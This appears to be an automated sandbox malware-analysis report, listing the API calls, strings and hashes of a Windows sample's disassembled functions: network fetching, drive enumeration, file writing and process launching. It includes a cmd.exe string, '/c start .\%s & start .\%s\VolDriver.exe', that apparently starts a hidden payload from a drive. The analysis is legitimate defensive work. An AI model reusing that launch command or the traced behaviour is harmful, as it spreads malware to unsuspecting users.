CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
TranslateMessage.USER32(?), ref: 004058E5
DispatchMessageA.USER32(?), ref: 004058EF
ExitThread.KERNEL32 ref: 00405901

Strings

0, xrefs: 00405840
%x%X, xrefs: 0040587A

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
Instruction ID: b462c37bb5856212f40d891765093af4ebd6b4ddfa956f9ba6030597f9716a14
Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
Instruction Fuzzy Hash: 3B212F71940308BBEB10ABA0DC49FEE7B78EB04711F148439F605BA1D0DBB955948F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE00 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040DE28
InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
memcpy.NTDLL(00000000,?,00000000), ref: 0040DFBA
InternetCloseHandle.WININET(00000000), ref: 0040DFF7
InternetCloseHandle.WININET(00000000), ref: 0040E004
InternetCloseHandle.WININET(00000000), ref: 0040E011

Strings

<, xrefs: 0040DE30
GET, xrefs: 0040DEEB

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
Instruction ID: 48cd83f5195f7f7898929b3619b8d091957442f788ca39022680675dc0c7e588
Opcode Fuzzy Hash: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
Instruction Fuzzy Hash: 51510D71941228ABDB36CB50CC55BD9B7BCAB44705F0480E9F60D6A2C1D7B96BC8CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406B30 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00406B3E
GetModuleFileNameW.KERNEL32(00000000,00416C68,00000104), ref: 00406B50

Part of subcall function 0040E9B0: CreateFileW.KERNEL32(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
Part of subcall function 0040E9B0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
Part of subcall function 0040E9B0: CloseHandle.KERNEL32(000000FF), ref: 0040E9F2

ExitThread.KERNEL32 ref: 00406CBA

Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE

Sleep.KERNEL32(000007D0), ref: 00406CAD

Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406BEF
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C04
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C1F
wsprintfW.USER32 ref: 00406C32
wsprintfW.USER32 ref: 00406C52
wsprintfW.USER32 ref: 00406C75

Strings

Unnamed volume, xrefs: 00406C46
(%dGB), xrefs: 00406C26
%s%s, xrefs: 00406C69

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$Unnamed volume
API String ID: 1650488544-2117135753
Opcode ID: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
Instruction ID: ad18969486da017d66fc0e664040911e0da7e4c37c3c5655858771b0e8e5c1cf
Opcode Fuzzy Hash: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
Instruction Fuzzy Hash: 6B41A9B1900318BBE714DB94DD55FEE7378EB48700F0081A5F20AB51D0EA785794CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA00 Relevance: 16.6, APIs: 11, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040EA32
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EA53
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EA72
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EA8B
memcmp.NTDLL ref: 0040EB1D
UnmapViewOfFile.KERNEL32(00000000), ref: 0040EB40
CloseHandle.KERNEL32(00000000), ref: 0040EB4A
CloseHandle.KERNEL32(000000FF), ref: 0040EB54
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EB73
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EB98
CloseHandle.KERNEL32(000000FF), ref: 0040EBA2

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID:
API String ID: 3902698870-0
Opcode ID: 3d158a9dff6b220208ce89ebcb141fa2d9abde8426d91b684894d5fe3e6cfe1f
Instruction ID: 5fa72956d792c98bf49e98e2e31999c9ee619b8bc34dd7c72e15d09ac2df7f98
Opcode Fuzzy Hash: 3d158a9dff6b220208ce89ebcb141fa2d9abde8426d91b684894d5fe3e6cfe1f
Instruction Fuzzy Hash: C2514EB5E40208FBDB14DFA4CC49FDEB774AB48704F108569E611B72C0D7B9AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D510 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0040D516
GetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,?,000000FF), ref: 0040D51D
GetCurrentThread.KERNEL32 ref: 0040D528
SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,?,000000FF), ref: 0040D52F
InterlockedExchangeAdd.KERNEL32(00407D0E,00000000), ref: 0040D552
EnterCriticalSection.KERNEL32(000000FB), ref: 0040D587
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D5D2
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D5EE
Sleep.KERNEL32(00000001), ref: 0040D61E
GetCurrentThread.KERNEL32 ref: 0040D62D
SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E), ref: 0040D634

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
Instruction ID: 00112f281c6e7fc3510a654903225a70fc6abbe47ad766b876a095a97212bdbe
Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
Instruction Fuzzy Hash: 64411C74E00209EFDB14CFE4D848BAEBBB5EF48305F108566E905A7380D7799A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040EBCE
memset.NTDLL ref: 0040EBDE
CreateProcessW.KERNEL32(00000000,0040F065,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EC17
Sleep.KERNEL32(000003E8), ref: 0040EC27
ShellExecuteW.SHELL32(00000000,open,0040F065,00000000,00000000,00000000), ref: 0040EC42
Sleep.KERNEL32(000003E8), ref: 0040EC5C

Strings

open, xrefs: 0040EC3B
, xrefs: 0040EC51
D, xrefs: 0040EBE6

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
Instruction ID: 0351ccfd918ecb695d128b5eda6762ce2dd083b24a7fe2c71c98e7e13efc789c
Opcode Fuzzy Hash: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
Instruction Fuzzy Hash: FE114271A44308BBF710DB91DD46FDE7774AB14B00F104125F6057E2C1D6FA5A44C759

Uniqueness

Uniqueness Score: -1.00%

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
Instruction ID: a734cc1f61c70acf9279ac5ca78d82aa64a2a4ecc5b5604f6a29b6a4ece08d42
Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
Instruction Fuzzy Hash: 89519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
Sleep.KERNEL32(000003E8), ref: 0040DB2E
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E

Strings

HTTP/1.1 200 OK, xrefs: 0040DB3F
LOCATION: , xrefs: 0040DB55

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
Instruction ID: 994a5b39e446e5258177b8a9e706ad28fc86481e8e9e2fe7090657293928531c
Opcode Fuzzy Hash: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
Instruction Fuzzy Hash: 3A2151B0D44218ABDB20DB64DC45BE97774AB04308F1486E9E719B72C0C6B95ACACF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC70 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EC87
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040ECA6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040ECCF
InternetCloseHandle.WININET(00000000), ref: 0040ECF8
InternetCloseHandle.WININET(00000000), ref: 0040ED02
Sleep.KERNEL32(000003E8), ref: 0040ED0D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EC82

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
API String ID: 2743515581-2272513262
Opcode ID: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
Instruction ID: 7e4e1c9f171caca0646539a3bded0a22de56d1af13d1156f275757e23962dbb7
Opcode Fuzzy Hash: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
Instruction Fuzzy Hash: 27213A74A40348FBEB14DF94CC49FEEB775AB04704F1084A9FA11AB2D0C7BA6A40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B500 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(004176A8,?,?,?,?,?,?,00407C92), ref: 0040B50B
CreateFileW.KERNEL32(00417490,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B55D
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B57E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B59D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B5B2
UnmapViewOfFile.KERNEL32(00000000), ref: 0040B618
CloseHandle.KERNEL32(00000000), ref: 0040B622
CloseHandle.KERNEL32(000000FF), ref: 0040B62C

Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID:
API String ID: 439099756-0
Opcode ID: a9f3d94bdcb9f5f0056996c106e0f71434a739864a126caadcc4012290d45a57
Instruction ID: 29fa8a612647d1d21a92a83f8fc84a43d263a312b3bcc6ad32b06dcb2fb765dc
Opcode Fuzzy Hash: a9f3d94bdcb9f5f0056996c106e0f71434a739864a126caadcc4012290d45a57
Instruction Fuzzy Hash: 41413C74E40309BBDB10DFA4CC4ABAEB770EB44708F208569E611B72D1C7B96641CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B60 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00416C40,?,?,?,?,?,00407C5C), ref: 00405B6B
CreateFileW.KERNEL32(00416E70,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407C5C), ref: 00405B85
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
CloseHandle.KERNEL32(00000000), ref: 00405C75
CloseHandle.KERNEL32(000000FF), ref: 00405C7F

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID:
API String ID: 3956458805-0
Opcode ID: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
Instruction ID: fe22dcd5f9c76504c29afc9a33c71b71b278b318499f2180723d1a87b0050cb8
Opcode Fuzzy Hash: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
Instruction Fuzzy Hash: 76311B74A40308EBEB14DBA4CD4AFAFB774EB44704F208569E601772D0D7B96A81CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406000 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00416C40,00000000,0040BB32,006A0266,?,0040BB4E,00000000,0040D2E4,?), ref: 0040600F
memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
CreateFileW.KERNEL32(00416E70,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
CloseHandle.KERNEL32(000000FF), ref: 0040623D
LeaveCriticalSection.KERNEL32(00416C40,?,?,?,?,?,?,0040BB4E,00000000,0040D2E4,?), ref: 00406248

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID:
API String ID: 1457358591-0
Opcode ID: 11af4e60f864a1ee5d179f7b11f5f910824527e1023db5757fbef91574a235bf
Instruction ID: e6130a6dfe54c84fffd3ba92570c30583d1ab1b9d3ba2be6bfb3361b08162579
Opcode Fuzzy Hash: 11af4e60f864a1ee5d179f7b11f5f910824527e1023db5757fbef91574a235bf
Instruction Fuzzy Hash: 9E71C0B4E002099BCB08CF94D885FEFB7B1EB58304F14816DE905BB382D679A951CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E480 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
SysFreeString.OLEAUT32(00000000), ref: 0040E59F
SysFreeString.OLEAUT32(00000000), ref: 0040E5B7

Strings

deviceType, xrefs: 0040E546
device, xrefs: 0040E533

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
Instruction ID: 3069ab4536640b36b0e12cde36f3ec166fb94fe14c65d0f959ecac372860a23d
Opcode Fuzzy Hash: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
Instruction Fuzzy Hash: 9D411A74A0020AEFDB14CFD5C884BAFB7B5AF48304F108969E505A7390E778EA81CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E320 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
SysFreeString.OLEAUT32(00000000), ref: 0040E43F
SysFreeString.OLEAUT32(00000000), ref: 0040E457

Strings

service, xrefs: 0040E3D3
serviceType, xrefs: 0040E3E6

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
Instruction ID: 3ee3a309e4cad0d77f423f26d7802281532f5296dcc9ab773efb6af10bc721e7
Opcode Fuzzy Hash: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
Instruction Fuzzy Hash: 7A413BB5A0020ADFCB04DF99C884FAFB7B5BF48304F108569E504A73A0D778AE85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: deb87a967b968b8c04415f7d1b08356640ab07502f924b2abe67f0fdf4d4051f
Instruction ID: a595f2b535375a145ed5326f987dfcc9cad8dea697baa589e2f3a50a699b5d5f
Opcode Fuzzy Hash: deb87a967b968b8c04415f7d1b08356640ab07502f924b2abe67f0fdf4d4051f
Instruction Fuzzy Hash: 2A31E372200215ABC710AFB5ED8CAD7B798FF54314F04463EF54DD3280DB79A4449B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406400 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040640B
CoCreateInstance.OLE32(00412768,00000000,00000001,00412748,?), ref: 00406423
wsprintfW.USER32 ref: 00406456

Strings

/c start .\%s & start .\%s\VolDriver.exe, xrefs: 0040644A
%windir%\System32\cmd.exe, xrefs: 0040645F
$h@, xrefs: 00406472, 00406475

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
